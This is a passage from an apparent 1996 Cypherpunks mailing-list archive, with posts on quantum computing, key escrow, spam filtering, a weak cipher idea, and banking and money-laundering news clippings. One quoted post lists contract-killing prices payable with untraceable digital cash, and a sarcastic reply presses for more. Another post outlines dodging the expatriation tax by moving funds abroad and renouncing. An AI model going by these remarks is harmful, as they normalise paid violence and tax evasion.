without being effected by the outside environment, even with the newly discovered quantum error correcting codes that would not be easy to do, not for that many operations. In the August 23 1996 Science is a fascinating research article by Seth Lloyd called "Universal Quantum Simulators". Lloyd has found a way for quantum computers to do something far, FAR, more useful than factoring numbers, and is much easier for the machines to do too. In quantum mechanics it's often possible in theory to predict what something will do but not in practice because of computational complexity, that's why Chemists must still perform experiments. To simulate the behavior of N electrons, in a conventional computer you would need memory space and computation time proportional to 2^2N. Just to figure out what's going on with 40 electrons, like those found in a medium sized atom, you would need to perform 10^24 operations. It's no wonder that Chemists keep their test tubes. Lloyd found a way to perform the same simulation using just N quantum bits (qubits) and the number of operations the quantum machine must do is proportional to N, not 2^2N as on a conventional computer. In addition, the time required to do the simulation over time t is proportional to t, in other words it can do it in real time, like an Analog computer. A very important feature of Lloyd's algorithm is that it doesn't demand that the Quantum computer be a perfect machine that is totally isolated from the environment, it easily deals with errors. Incredibly, noise from the environment and decoherence can be useful to the computer, it can actually help it simulate noise and decoherence in the system it's simulating. This may help put a stop to all the "End Of Science" books we've been seeing lately. People were saying that it was a waste of time to try to find a quantum theory of gravity because there would be no way to test it. It would be a HUGE calculation, but a thousand qubit quantum computer could do it. Lloyd says we could make a Quantum Computer today with a few tens of qubits and it would "require only minor modifications of current technology". I'd say that's a pretty good start. He also says "The wide variety of atomic, molecular, and semiconductor quantum devices available suggests that quantum simulation may soon be a reality". In a separate development, Lov K Grover of ATT recently found a way for a Quantum Computer to find a piece of information in a random list with N items in just the square root of N steps, not 1/2 N steps, which is the average if you do this on a conventional computer. Apparently the appeal of making a calculation on 2^n numbers at the same time with a machine that only has n qbits is too strong for the military to ignore. In the same issue of Science is an article about the defense department making a 5 million dollar grant to start an institute for Quantum Information and Computing (QUIC). It's charter has 5 aims. 1) Improve quantum algorithms. 2) Improve quantum logic gates. 3) Improve the architecture of Quantum Computers. 4) Improve quantum error correcting codes. 5) Study the general theory behind quantum computation. I find all this very exciting, it must have been like this in the late 1930's when reports trickled in about nuclear fission and the idea occurred to people that a bizarre device like a nuclear bomb might actually be able to exist in the real world. John K Clark johnkc at well.com -----BEGIN PGP SIGNATURE----- Version: 2.6.i iQCzAgUBMj9UEH03wfSpid95AQGa4wTwubIy9BE9emWFU1DVaDL7+o7p5Z86OVah iBd3OKgONhJUmodDz5Egq7dwzqLvS2Rc5BQ7UPmT5uezzE/6wxmVDRAqxjJFKWHa 1TJtSv94d/S5HA8RjaAMWpOPOKQUf0KILy+jfoQMrpCLFd0cKM+aQUyhExPN92A7 EyIDQ3RUnAJNYR5JVXUVcEsiDVuPney56ZwkOqx1KAhuTI/Bcdg= =AKnq -----END PGP SIGNATURE----- From frissell at panix.com Tue Sep 17 22:21:26 1996 From: frissell at panix.com (Duncan Frissell) Date: Wed, 18 Sep 1996 13:21:26 +0800 Subject: The Expat Tax Is Law - The Door Is Now Closed! Message-ID: <3.0b19.32.19960917191959.00e3a694@panix.com> At 05:11 AM 9/17/96 -0700, Tim May wrote: >It makes me want to just put my stock certificates in my luggage and just >drive on down to Mexico and cross the border (no border checks) and go >from there to some safer haven. > >(However, I imagine the Feds can effectively block sales of my stock--the >stock is still formally only an accounting entry, as stock certificates >are not "bearer instruments." I could probably relocate to a foreign haven >and sell the assets before the IRS would even notice...unless they >computerize. I suspect this is coming.) But since a 10-year old (who is willing to break the law) can defeat their expat tax, what difference does it make. All one has to do is cash out, transfer all funds overseas, follow them, and renounce. Move the funds around a little. It's not tax fraud (no false documents have been uttered -- indeed no documents at all). Just take your marbles and go home. DCF From dlv at bwalk.dm.com Tue Sep 17 22:23:22 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 13:23:22 +0800 Subject: Spam blacklist project In-Reply-To: Message-ID: Rabid Wombat writes: > > You haven't answered my question, Lues. If the list of e-mail addresses of > > people who DON'T want junk e-mail is made available for _free for FTP, > > together with a tool for spammers to scrub their mailing lists of these > > addresses, and an easy way for anyone to add his or her address to this > > list for _free, then how would Slaton _sell this list to anyone? > > > > Easily. What percentage of, er, mass internet advertisers would know that > this site exists? Some mass advertizers are pretty bright and have good brains working for them. Others will be destroyed by the market forces. > I assume it would become a very large list, and would > make a very atractive target for someone who wanted to provide email > addresses to others for a fee. Most mass e-mailers are in touch with one another via DEMMA, who's been promoting the idea of "do not e-mail" list. If such a list and the scrubbing software are made available for free on an FTP server, they'll know about it. If they can get away with e-mailing their stuff to hundreds of thousands of addresses and not having theur plugs pulled by merely scrubbing their lists from people who object, they'll salivate over this prospect and kick the asses of whoever jeopardizes their business by mailing to "unscrubbed" lists. > I'd say it's a safe bet that the unscrupulous could easily sell a large, > up-to-date list of email addresses of people who DON'T want junk email to > people who want to send such mail. I rather doubt it. Business people tend to be much smarter than the geeks you see at academic computing centers and ISP's. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Tue Sep 17 22:27:32 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 13:27:32 +0800 Subject: "But if it saves just one child." Message-ID: At 1:52 AM 9/18/96, "" wrote: >On Mon, 16 Sep 1996, attila wrote: > >> = .The rallying cry heard so often these days: "But if it saves just one >>child." >> = . > > >ACCKKKKKIK. > >SYN >ACK >GAK >BLAH. > >Read some Ayn Rand. >This must end. > >IOW: I call bullshit. I call total bullshit. >The net, fomerly my oasis, needs death. Millie, First, Attila was quoting my comment. Second, this was sarcasm. (Or, variously, facetiousness, tongue-in-cheek, and other varieties of irony.) You really need to learn when someone is _supporting_ your point of view through such uses of irony, rather than going ballistic, Just a Modest Proposal, as it were, he said Swiftly. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Tue Sep 17 22:28:31 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 13:28:31 +0800 Subject: The Expat Tax Is Law - The Door Is Now Closed! In-Reply-To: <199609171211.FAA02724@you.got.net> Message-ID: tcmay at got.net (Tim May) (fart) writes: > The imposition of draconian taxation policies effectively says that the > U.S. is now doing what the Soviet Union did to emigrants: demand that they > "pay back" various costs the government claimed they had incurred. Not true. The late Soviet Union tried asking emigrants to pay for their higher education (i.e. college and graduate school), not the secondary education, medical care, and other substantial costs borne by the society. They did it as an experiment for, I think, less than a year, and stopped because of the whining from the United States (the primary benefitiary of the free Soviet education, whatever it was worth). The U.S. does things the former Soviet Union would never have thought of. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From pstira at escape.com Tue Sep 17 22:31:00 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 13:31:00 +0800 Subject: "But if it saves just one child." In-Reply-To: Message-ID: Timmy boy, I yelled at someone for this last week. And you supported my view. Never read Ayn Rand, eh? -Millie two sides, both sarcastic ==> chaos On Tue, 17 Sep 1996, Timothy C. May wrote: > At 1:52 AM 9/18/96, "" wrote: > >On Mon, 16 Sep 1996, attila wrote: > > > >> = .The rallying cry heard so often these days: "But if it saves just one > >>child." > >> = . > > > > > >ACCKKKKKIK. > > > >SYN > >ACK > >GAK > >BLAH. > > > >Read some Ayn Rand. > >This must end. > > > >IOW: I call bullshit. I call total bullshit. > >The net, fomerly my oasis, needs death. > > Millie, > > First, Attila was quoting my comment. Second, this was sarcasm. > > (Or, variously, facetiousness, tongue-in-cheek, and other varieties of irony.) > > You really need to learn when someone is _supporting_ your point of view > through such uses of irony, rather than going ballistic, Just a Modest > Proposal, as it were, he said Swiftly. > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From dthorn at gte.net Tue Sep 17 22:31:10 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 18 Sep 1996 13:31:10 +0800 Subject: Snake-Oil products Message-ID: <323F3541.7CC5@gte.net> If this were a board for a commercial monopoly such as the AMA, I could understand (albeit not necessarily agree with) the dire warnings about the people pushing "Snake-Oil" products, if indeed what's being promoted are actual products. The large FAQ sheets are pretty good, actually, like a mini-review of crypto issues, but what is the purpose of the dire warnings in relation to this forum, other than certain parties marking their territory? From gbroiles at netbox.com Tue Sep 17 22:38:36 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 18 Sep 1996 13:38:36 +0800 Subject: Spam blacklist project Message-ID: <3.0b19.32.19960917191100.0069a12c@pop.ricochet.net> At 12:52 PM 9/17/96 -0400, Rabid Wombat wrote: >I'd say it's a safe bet that the unscrupulous could easily sell a large, >up-to-date list of email addresses of people who DON'T want junk email to >people who want to send such mail. That's why the list should be distributed (as the original poster mentioned) in hashed format - the junk email people would then hash their own list(s), and would know not to send to addresses where the hashes matched. The unmatched hashes addresses on the "block" list aren't otherwise useful to the junk e-mail folks. It's an interesting idea .. but who is going to pay for it? (doh.) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From tcmay at got.net Tue Sep 17 22:41:10 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 13:41:10 +0800 Subject: The GAK Momentum is Building... Message-ID: At 2:00 AM 9/18/96, an12054 (S. Boxx) wrote: >the Clipper proposals are increasingly moving into the >area of "key management". large companies will always >want key management features, to deal with employees who >forget passwords, leave the company, etc.-- face it, this >is a simple reality. essentially all the latest >moves amount to, imho, is the government trying to get >its fingers into these key management infrastructures. Companies wishing to tell their employees how and when they may encrypt communications is something I have no problem with. Corporations do this all the time, and even make various arrangements with other companies for various services. However, making the government a _required_ part of such plans implies a motive that is not at all the same as what companies wish (mostly, disaster recovery). And, as has been noted so many times by so many of us, whatever the motivations for corporate key escrow systems for disaster planning are, there are no motivations for key escrow for _communications_. If the sender dies, or leaves, or whatever, the company can reconstruct his communications from _his_ key. Or the receiving side can reconstruct the recipients messages from _his_ side. The only party interested in having access to "in transit" communications are the wiretappers and SIGINT folks. Think about it. No company I can think of is interested in reconstructing messages from the _actual communications_, only from the keys of employees. The NSA and FBI, however, are _keenly_ interested in reconstructing messages from intercepts, of course, and hence are pushing for escrow of _communications_ keys! Furthermore, the main worry (for me, at least) is that the government hopes to get its Clipper IV scheme accepted (by means of export laws) at some large fraction of important corporate accounts, not the least of which will be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players in the "infrastructure" business. Once most of these have "bought off" on GAK, pressure will be intense to universalize the process, to make it a felony _not_ to use a "Key Authority." (BTW, I predict that the tainted term "key escrow" is now gone from the official lexicon. I haven't seen the Clipper IV proposal, but I surmise that the baggage the term "key escrow" carries means that some more benign-sounding term will be used in the final proposal. Something like "Key Recovery System." You heard it here.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From sjohnson at packetengines.com Tue Sep 17 22:41:14 1996 From: sjohnson at packetengines.com (stuart johnson) Date: Wed, 18 Sep 1996 13:41:14 +0800 Subject: a simple cypher scheme Message-ID: <9609180005.AA14720@ns.tsinet.com> all, i've been on cypherpunks for about a year a half now, and have wacthed many interesting threads pass by but i've never posited anything. what has brought me out into the open is this : i work for an engineering firm doing asic design, i use pgp ( as do all rational persons ), a co-worker here has come up with a 'cypher' scheme that he would like to use to send code to our clients. the scheme is this : he would take the file of code and pad all lines to the length of the longest line, he would then preform column swaps, and then row swaps, to 'mix up' the file. the person receiving the file would then preform the opposite functions to recover the file. it seems so simple that it can't be good. i've convenced him to use pgp, but i would like some input if possible on why his cypher scheme is not a good one. thanx -stuart Packet Engines - The Industry leader in Gigabit ethernet / o o o o o o o . . . o o ______ _________ ________ ________ __=====__T___ o |DDD[ _______ | | | | | | | |_|| .][__n_n_| | | 802.3 | | ATM | | MPEG | | FDDI | | SCSI | >(________|___|__|_______|_|_______|_|______|_|______|_.|________|_| _/oo OOOOO oo` 'o^o o^o 'o^o o^o`'o^o o^o`'o^o o^o`'o^o o^o` -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+--+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ | "all sufficiently advanced || Stuart Johnson | technologies are indistinguishable || Lead Asic Engineer | from magic," || Packet Engines Inc. | --Arthur C. Clarke || sjohnson at packetengines.com From vznuri at netcom.com Tue Sep 17 22:51:03 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 18 Sep 1996 13:51:03 +0800 Subject: timmy waxes a widdle on AP In-Reply-To: Message-ID: <199609180311.UAA24662@netcom15.netcom.com> >(Hint: One reason I seldom discuss AP is that to me it's just a special >case of the larger issue of untraceable markets for such acts, something >I've been worried about for almost a decade now. There is little reason to >engage in the fiction of a "betting pool" when a hit may be untraceably >contracted for and the standard fee ($1000 or less in some inner cities, >$5000 for ordinary suburbanites, $30,000 or more for high-profile >cases...so I hear) be paid with untraceable cash...as soon as truly >untraceable digital cash becomes a reality.) I always thought you hated to discuss AP because you didn't want to appear overly knowledgeable on the subject.. heh heh hmmm, interesting points. sounds like a *lucrative* business. perhaps even some major *investment*opportunities* involved, eh!!! but I'm still a bit confused about those prices. what determines them, anyway? risk to the assassin? it seems that it ought to be as easy to snuff out one person as it would another. e.g. everybody walks alone out at night at different times, it seems. perhaps we have some assassins that are offering some kind of "value added" services to justify the difference in pricings. otherwise, it would seem to be a scam just like IBM did with one of their printers-- have a version that has a "slowdown chip" in it and charge less for that one. charging what the market will bear regardless of cost so to speak... since you are so open to discussion of the subject, would you care to speculate on the cost of, say, a person who has a large stock portfolio? or how about a cyberspace crackpot? I guess the latter would go for something like $100 on your sliding scale and the former for 100K+, maybe? do you have to pay different amounts of money whether you want a special kind of arrangement like a slow, agonizing demise? does that cost more or less than the quick and deadly type? I must admit I'm new to the concept and could definitely use some input from someone with some obvious knowledge on the subject such as yourself. I do rather like Jim Bell's ideas of pools however. maybe not have a betting pool, but just a pool of contributions from multiple "donors". do you think that idea has no merit? it seems like there ought to be all kinds of uplifting applications of that arrangement, hmmmm? so who are your "sources" for those estimates, anyway, timmy? hee, hee. be vewry carefwul!!! we're hunting wabbits!!!! From shamrock at netcom.com Tue Sep 17 22:51:19 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Sep 1996 13:51:19 +0800 Subject: RSA chip spec dist. paused until tomorrow Message-ID: Due to the overwhelming number of requests for the new RSA chip data sheets, I am moving from a fax to a web distribution. A fellow CP is currently scanning in the 28 page specs. We will post the URL tomorrow. If the chip and the RSA/DES ISA board (using the chip) currently in my possession work as well as I hope they do, either the company I work for or I will most likely distribute them. I have not yet received a request for the one loaner chip. Are there no hardware-hacking CPs in the SF Bay Area? That seems hard to believe. --Lucky From null at void.gov Tue Sep 17 23:07:48 1996 From: null at void.gov (#6) Date: Wed, 18 Sep 1996 14:07:48 +0800 Subject: Anthrax on the 'net [skating rinks to be outlawed] In-Reply-To: <9609172114.AA26321@outland> Message-ID: <323F6EF2.5B23@void.gov> Two teens reported being propositioned, outside the neighborhood skating rink, to participate in the making of some kiddie porn. They called police who made some arrests (I think). The city council is considering legislation to outlaw skating rinks. From dlv at bwalk.dm.com Tue Sep 17 23:09:43 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 14:09:43 +0800 Subject: Dealing with junk mail In-Reply-To: <01I9L7W8DYNA8ZO0TR@delphi.com> Message-ID: <8HHFuD94w165w@bwalk.dm.com> JMKELSEY at delphi.com writes: > I just don't think > I'd like Delphi to start filtering my e-mail without asking me for > permission and instructions first.) Likewise a number of AOL users don't like the idea of AOL deciding what they can and can't read. (By the way one of the good things about AOL is that they ignore all Usenet cancels.) AOL is promising to let its users filter their incoming mail the way they want to by the end of September. > Each user has a mail filter with a set of rules written either by or > for that user. The mail filter does one of four things with each > piece of e-mail it receives: > > a. It lets the e-mail through immediately. (E-mail from friends, > employers, employees, family members, etc. would probably be in this > category.) This should not be the default. > b. It discards the e-mail immediately. (E-mail from people you > really didn't like, and from people who have spammed you in the past > would probably be in this category.) Or may from mailing lists submitted by known idiots. > c. It puts the e-mail on hold in some storage area. This should be the default for unknown senders. > d. Send e-mail back to the sender, informing him of conditions > under which the user is willing to accept this e-mail. This > might be things like requiring anonymous users to provide some > minimal kind of identity, or telling senders ``I'll read your > e-mail for one dollar in digicash,'' or ``I'll read your e-mail > if you carry out this computationally expensive calculation, or > some other thing. > > For e-mail in the third category, some kind of summary report is > sometimes generated, to be sent to a server. The server collects > these reports, and uses some kind of system (maybe rule-based, but > probably involving scores to estimate probability of spam or other > unwanted e-mail) to determine what is and is not spam, and with what > probability. It then sends to each of its subscribers, every day or > so, a report indicating scores for users' messages. (These should > be individualized.) One can simply choose to read the a) mail now and c) mail later. Consider this scenario: 10:00 Eve sends junk e-mail to Alice and Bob. 10:05 Alice reads her urgent e-mail; leaves non-urgent e-mail for later. 10:30 Alice reads non-urgent e-mail, discovers junk mail from Eve. 10:31 Alice posts a warning to a Usenet newsgroup about junk e-mail from Eve, specifying a pattern than matches Eve's junk mail, and perhaps an address for postmaster complaints. 10:40 Bob starts reading his e-mail. Before he begins, his e-mail reading program fetches new e-mail notices from the usenet newsgroup, finds the ones from the issuers Bob trusts, checks their PGP signatures, and adds their patterns to its database. It then junks Eve's letter (discards it or bounces it to the postmaster, whatever Bob chooses) Note that procmail can't do it - procmail would get Eve's junk mail at 10:00. We want to delay the processing of the incoming queue to get the latest available junk mail notices. > The junk e-mailers can try various countermeasures to this. The > most obvious are: > > a. Try to hit people who aren't using a good junk-mail filter. > b. Try to make it against the law to use a junk-mail filter. > (Perhaps this would be the case only for PSA spams?) It's probably a bad idea for an ISP to impose such filters on users without letting them "opt out", as AOL tried to do. > c. Try to disguise their e-mail to make it not obviously junk > e-mail, and simultaneously to alter each message to avoid > detection by the servers, by making changes to each message, > timestamp, and claimed sender ID. That would an interesting technical challenge. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Tue Sep 17 23:10:50 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 14:10:50 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: <3kJFuD96w165w@bwalk.dm.com> Money Laundering Alert: August 1996 'Unauthorized' Banks Pose Laundering Threat They are subject to none of the recordkeeping or reporting requirements of the Bank Secrecy Act, receive no examinations from any banking regulator, and may be on your bank's currency transaction reporting exemption list. The Office of the Comptroller of the Currency refers to them as "entities that may be conducting banking operations in the U.S. without a license." Money launderers probably refer to them as dreams come true and, unless legitimate financial institutions are alert, can use them to place illicit proceeds into the financial system. They are "unauthorized" banks, and for the past five years the OCC has been disseminating advisories to legitimate U.S. banks - but not to consumers - in an effort to expose their existence and halt their illegal operations. These so-called "banks" offer a variety of banking services, often at lower fees and better interest rates than legitimate banks offer. What makes them different from a legitimate bank - and attractive to money launderers -- is that they are not licensed by any U.S. banking agency and thus do not have to meet regulatory standards. Because the OCC and other federal bank regulators are not investigative agencies, they can do little more than report these institutions to those who are. If the entities are found to be operating a bank without a license they can be prosecuted under the Glass-Steagell Act (Title 12, USC Sec. 378(a)(2)). Such prosecutions are rare. In one case in 1994, initiated by Federal Reserve Board examiners, the principals of Lombard Bank, Ltd., were charged with operating an unauthorized bank through a payable-through account at American Express Bank International in Miami. Lombard, which had been "licensed" in the South Pacific money laundering haven of Vanuatu, offered its Central American customers virtually full banking services in the U.S. through its PTA (MLA, Sep. 1994). Earlier this year, the OCC released a list of more than 50 "banks" known to be operating without authorization. OCC officials say the number grows steadily. Some of the "banks" say they are licensed by foreign countries or U.S. states to conduct banking business. Others, such as the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer services in the U.S. despite edicts from foreign banking authorities to cease doing business. The unauthorized entities have a common trait. They usually have names that are similar to those of well-known legitimate institutions. The OCC list includes the Bank of England, a Washington, D.C., entity not associated with London's famous "old lady on Threadneedle Street" and Citicorp Financial Services, a Beverly Hills firm not associated with the better-known institution of that name. It also includes the First Bank of Internet, which heralds itself as the first bank in cyberspace. Through its periodic "special alerts," the OCC warns banks to "view with extreme caution any proposed transaction involving any of the listed entities." It makes no effort to educate members of the general public who unknowingly place their money and trust in those uninsured institutions. American Banker: Friday, August 30, 1996 Swift Near Alliance in Trade Document Automation By STEVEN MARJANOVIC Swift, the international banking telecommunications network, wants to play a bigger role in trade finance and the exchange of related documentation. Sources said the Brussels-based organization will soon take a position-- perhaps as early as its September board meeting-- on whether to work on trade automation in cooperation with another consortium, called Bolero. Such a move would involve an increase in nonbank participants on a bank-owned network that has approached such liberalization cautiously. Swift, formally the Society for Worldwide Interbank Financial Telecommunication, is used by 5,300 banks for exchanging messages in such areas as funds transfer, foreign exchange, and securities. The network averaged about 2.7 million messages a day in July, representing daily dollar volumes exceeding $2 trillion. Officials said Swift is nearing a decision to work with the Bolero Association, which is forming an electronic registry for the so-called "dematerializing" of trade documents. Swift could provide the "platform" for allowing banks and corporations to exchange such documentation as letters of credit and bills of lading. Bolero was formed in 1994 with funding from the European Commission, but has not formulated concrete operating plans. Its members include Citicorp, Barclays Bank PLC, and other multinational banks and corporations. Peter Scott, trade services market director at Swift, said it has been in discussions with London-based Bolero since December 1995 about joining forces to automate the exchange of trade documents. "Bankers are beginning to sense both the opportunities in those areas and the threats to them from an intermediary stepping in and potentially taking away the business," Mr. Scott said. Trade-document capability "is not a heavily utilized area within Swift at the present time," he said. The potential in automation is obvious to Bolero officials. At the New York Banktrade Conference recently, John McKessy, the association's North American representative, said the annual value of goods moved internationally approaches $4 trillion. He estimated current international trade requires some three billion documents to be issued and managed. The cost of dealing with paper alone eats up about 7% of the total value of those goods, as much as $280 billion, Mr. McKessy said. Bank revenues from issuing letters of credit last year were just over $1 billion, according to a soon-to-be-released survey by the U.S. Council on International Banking. Anthony K. Brown, senior vice president of trade services at MTB Bank, described trade transaction processing as "extremely cumbersome and tedious, prone to mistakes and delays (that) can be a hindrance to the completion of a transaction." MTB is a $400 million-asset merchant bank based in New York. About 80% of its $100 million in loans are trade-related. The paper-shuffling costs are not borne entirely by banks. Import/export companies, insurers, freight forwarders, and various government inspection agencies are also involved. "The question is whether Swift wants to do it," said Dan Taylor, president of the New York-based U.S. Council. "Swift is going to act fairly quickly on this," he added. Mr. Taylor said Swift officials will likely grapple once again with the political and philosophical issues of giving nonbanks more access to Swift, and to payment systems generally. In 1995, the network granted partial access to nonbanks after years of heated debate. "You always have this push and pull, where some banks would like Swift to do certain things" while others want the network to focus on the money transfer business, Mr. Taylor said. "If Bolero succeeds and Swift joins, I think it will move fairly rapidly, but I'm not sure that Bolero is going to be the only thing out there." He said Bolero might evolve using value-added networks - or intranets - like the IBM Global Network and General Electric Information Services Co., or perhaps even the Internet. Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is apparently talking to several providers of private, value-added networks and may soon enter a contract with one. CSI letter-of-credit software leads the pack in banking, with about a 16% market share, Mr. Taylor said. The company recently formed a business unit called Electronic Documents International, which has developed an Internet-based system for initiating letters of credit. CSI spokesman George Capsis said the software, Import.com, creates "about 30 key documents involved in international trade." The Internet, enhanced with security features, may help the trade industry reduce paper-related costs, especially at smaller companies overseas. CSI managing director Andre Cardinale said customers need only to "dial into a bank's Internet server, pull up the Import.com application, and actually fill in the details to create a new letter of credit or an amendment to an existing one." While Bolero may find a place on the Internet or a GE-type network, Mr. Cardinale said the ultimate push may yet come from the banking industry working collectively through Swift. He said Swift opposition from nonbank constituencies that are concerned the telecommunications cooperative will be more sympathetic to banks when disputes arise. But "if Swift does it," he added, "it will bring banks into the universe far more - pardon the pun - swiftly." Crain's New York Business: August 26, 1996 Bloomberg to Detail Growth of Information Empire Michael Bloomberg made a name for himself on Wall Street with his trading acumen and mastery of the computer systems that were becoming crucial to success in the securities business. But no one suspected when he left Salomon Brothers in 1981 that in the next decade he would build the fastest-growing provider of financial information in the world. Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated sales of $600 million, will be the keynote speaker at the fifth annual Crain's ''Growing a Business Expo,'' to be held this year on Thursday, Oct. 24. The event will take place at the New York Hilton & Towers from 8 a.m. to 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and Empire Blue Cross and Blue Shield. Last year, more than 1,000 growing business owners and managers attended the expo, which provides information for companies operating in the city regarding potential suppliers, financial resources and government programs. The cost to attend the event is $45 and includes a continental breakfast. Individuals registering before Sept. 6 can bring a colleague for free. To register, call Flagg Management at (212) 286-0333. In addition to Mr. Bloomberg's speech, attendees will be able to attend seminars on financing and other help available from the city, financing techniques, energy cost savings programs and how to reduce health insurance costs. An expected 135 exhibitors will be offering products and services of use to growing companies. Crain's New York Business editors will discuss how a growing business can get coverage in Crain's and in other publications. The heart of Mr. Bloomberg's empire is a news gathering operation that sends information through 62,000 computer terminals installed on the desks of investment professionals around the nation. His company provides the latest financial news and sophisticated tools to analyze information. The company he has built is noted for its lack of bureaucracy despite its growth to 2,000 employees. Its hallmarks are hands-on leadership and an entrepreneurial atmosphere where employees receive perks such as free food. Mr. Bloomberg has extended his reach to include an all-news radio station in New York, WBBR; Bloomberg Personal TV; syndicated television shows; a monthly personal finance magazine; and a similar magazine for institutional investors. American Banker: Friday, September 6, 1996 America Online Opens a New Banking Channel By DREW CLARK Nineteen banks - national home banking stalwarts such as Citicorp and BankAmerica, plus a complement of less prominent regionals - have climbed onto the America Online bandwagon. Most already offer their customers several options for banking via personal computer and view America Online, with its six million subscribers, as a way to appeal to a broad cross-section of computer- literate consumers. Fourteen of the AOL banking partners will be delivering services through BankNow, a software package developed for the interactive network by Intuit Inc. The other five banks have opted to use their own software. One of them - Security First Network Bank, which operates entirely on the Internet - will invite AOL users in through their Web browsers. With its announcement this week, America Online Inc. takes its place among the many alternative "channels" for on-line banking. Many of the banks on AOL's list are simultaneously cooperating with other companies that are themselves competitors, such as Intuit and Microsoft Corp., suppliers of the Quicken and Money financial management software, respectively. Also crossing competitive lines, America Online said its subscribers will be able to bank from home with PC software from three suppliers other than Intuit: Checkfree Corp., Online Resources and Communications Corp., and Visa Interactive. "Everyone understands that there is competition in the home banking arena," said David Baird, general manager of the personal finance division at America Online, based in Dulles, Va. "To align ourselves with exclusively one company would be a mistake." Intuit can count on 14 initial bank users of BankNow. Spokesmen for the other three system vendors declined to say when they expect to have home banking products available for the AOL channel. Experts noted that AOL and Intuit could be a strong tandem, in that they dominate their respective businesses. Intuit's Quicken is the leading brand in personal finance software. The company claims more than 9 million active users and a market share of about 80%. America Online's subscriber base of six million is as big as those of its next two competitors, Compuserve and Prodigy, combined. The financial institutions currently offering BankNow are: American Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama, CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York, Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of California. More plan to offer BankNow-based services through AOL later this year: BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon. Unlike Quicken, BankNow software is available free to America Online subscribers. Banks' fees will vary. First National Bank of Chicago said it will charge $3.95 a month for on-line banking and $9.95 a month for other services that include bill payment. Centura Banks Inc. said it will offer on-line banking free, and charge $5.95 a month for bill payment. Intuit officials declined to disclose what its Intuit Services Corp. processing unit will charge to handle these transactions for banks. Some of Intuit's larger bank partners chose not to offer BankNow because they already promote their own PC banking programs. For example, Citicorp, First Union, and Wells Fargo each support Quicken, but passed on BankNow. Instead, they are paying a premium for a "button" on America Online's banking screen that will eventually link users to a proprietary home banking program. AP Online: Thursday, September 5, 1996 House Probes Money Laundering By ROB WELLS House Banking Committee members on Thursday urged a Treasury Department agency to step up its efforts to halt money laundering by Mexican drug lords. Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement Network to put in place new regulations to plug a significant loophole that allows Mexico's drug dealers to place their ill-gotten profits back into the U.S. Bachus, chairman of the House Banking oversight subcommittee, said Congress gave authority to FinCen in 1994 to put in place new rules that would prevent drug dealers from using foreign bank drafts, a type of check, to evade currency reporting restrictions. ''That effort is long, long overdue,'' Bachus said. Rep. Henry Gonzalez, D-Texas, asked the agency to provide further details about suspected money laundering in his home town of San Antonio, particularly the source of a $3 billion cash surplus in the San Antonio Federal Reserve Bank. The issue arose as Bachus' panel began exploring the dramatic rise of narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the ease with which drug dealers can ship their profits to the south. Money laundering refers to the practice by which drug dealers, mobsters and others 